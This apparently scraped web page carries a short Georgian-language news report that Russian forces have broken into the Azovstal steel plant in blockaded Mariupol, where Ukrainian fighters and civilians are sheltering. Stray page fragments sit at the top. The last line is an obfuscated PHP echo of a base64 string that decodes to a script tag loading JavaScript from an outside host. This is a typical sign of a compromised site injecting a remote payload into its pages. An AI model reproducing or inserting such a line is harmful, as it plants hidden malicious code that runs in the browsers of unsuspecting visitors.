tube
ავერსი jaluzi
რუსი ოკუპანტები მარიუპოლში "აზოვსტალის" ქარხანაში შეიჭრნენ. ამის შესახებ წყაროზე დაყრდნობით "უკრაინსკაია პრავდა" წერს.
 
ბლოკირებულ მარიუპოლში რუსები ორი დღეა შეტევას ახორციელებენ "აზოვსტალზე", რომლის სარდაფებშიც უკრაინელი მებრძოლები და მშვიდობიანი მოქალაქეები იმყოფებიან.
 
შტურმი განსაკუთრებით გაძლიერდა სამშაბათს 3 მაისს, ქარხნიდან მშვიდობიანი მოსახლეობის ნაწილობრივი ევაკუაციის შემდეგ. დღეს კი გავრცელდა ცნობა, რომ რუსები ქარხანაში შეიჭრნენ, მანამდე კი ტერიტორია დაბომბეს და დაცხრილეს.
 
"აზოვსტალში" მძიმე ბრძოლები მიმდინარეობს. უკრაინელ მებრძოლებთან, ჯერჯერობით ,არანაირი კავშირი არ არის.
889
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");